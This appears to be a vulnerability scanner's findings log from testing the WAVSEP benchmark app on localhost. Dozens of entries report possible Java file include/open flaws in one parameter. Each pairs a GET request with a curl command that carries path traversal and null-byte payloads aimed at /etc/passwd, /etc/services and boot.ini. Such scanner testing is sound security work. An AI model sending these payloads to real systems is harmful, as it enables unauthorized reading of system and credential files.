Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
